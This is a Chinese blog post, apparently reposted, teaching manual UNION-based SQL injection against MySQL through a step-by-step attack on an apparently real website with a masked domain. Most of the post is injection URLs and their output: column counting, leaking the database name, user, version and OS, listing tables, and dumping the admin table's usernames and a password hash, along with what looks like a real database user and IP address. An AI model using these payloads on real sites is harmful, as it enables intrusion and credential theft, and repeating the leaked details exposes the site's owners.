Sql注入基础_mysql注入

Mysql数据库结构

数据库A

  表名

    列名

      数据

数据库B

  表名

    列名

 

      数据

 

Mysql5.0以上自带数据库:information_schema

information_schema:存储mysql下所有信息的数据库(数据库名,表名,列名)

 

参数及解释

database():数据库名

user():数据库用户

version():数据库版本

@@version_compile_os:操作系统

符号“.”代表下一级的意思

information_schema.tables

information_schema数据库下的tables表名,含义:存储所有数据库下的表名信息的表。

 

information_schema.columns

information_schema数据库下的columns表名,含义:存储所有数据库下的列名信息的表。

 

Table_schema:数据库名

Table_name:表名

Column_name:列名

 手工实例,aabb代替网站

判断存在注入:
http://www.aabb.com/news.php?id=6811 and 1=1正常
http://www.aabb.com/news.php?id=6811 and 1=2异常

判断字段:
http://www.aabb.com/news.php?id=6811 order by 42正常
http://www.aabb.com/news.php?id=6811 order by 42异常


联合查询:
http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42

					报错5,6,15,20,24


查询相关内容:

可以在显位的位置插入的预设函数;
User() 查看用户  
database()  --查看数据库名称     
Version() --查看数据库版本   
@@datadir --数据库路径
@@version_compile_os--操作系统版本   
system_user() --系统用户名  
current_user()--当前用户名   
session_user()--连接数据库的用户名

http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,database(),user(),7,8,9,10,11,12,13,14,version(),16,17,18,19,@@version_compile_os,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42

			数据库:bdm113183329_db    用户:bdm113183329@123.56.134.176    版本:5.1.48-log     操作系统:unknown-linux-gnu 



查询所有数据库:http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,
group_concat(schema_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.schemata

			只有两个数据库 information_schema, bdm113183329_db




查寻bdm113183329_db下所有的数据表:
				bdm113183329_db ===》 0x62646D3131333138333332395F6462
				
http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,
group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.tables where table_schema=0x62646D3131333138333332395F6462

			admin,admin_copy,ads,area,article,article_copy,books,catalog,city,contents,hezuos,paimai,paimaihui,
			province,user_info,user_info_copy,works,xhad_ad,xhad_admin,xhad_biz,xhad_config,xhad_day,xhad_hour,
			xhad_ip,xhad_month,xhad_type,xhad_year,ysj_dongtai,ysj_wzpl,zhanlan


查询admin表下的列:
	http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,
group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.columns where table_name=0x61646D696E

	a_id,a_user,a_pass,a_flag


查询每列数据:
	http://www.aabb.com/news.php?id=-6811 UNION SELECT 1,2,3,4,group_concat(a_user,0x5c,a_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from admin

	admin\86aba080f25bb66edd1ab981e4ecbe68
	admin\ysjaabb 





		


	
	

 

 

 

    原文作者:cui0x01
    原文地址: https://www.cnblogs.com/cui0x01/p/8620524.html
    本文转自网络文章,转载此文章仅为分享知识,如有侵权,请联系博主进行删除。
点赞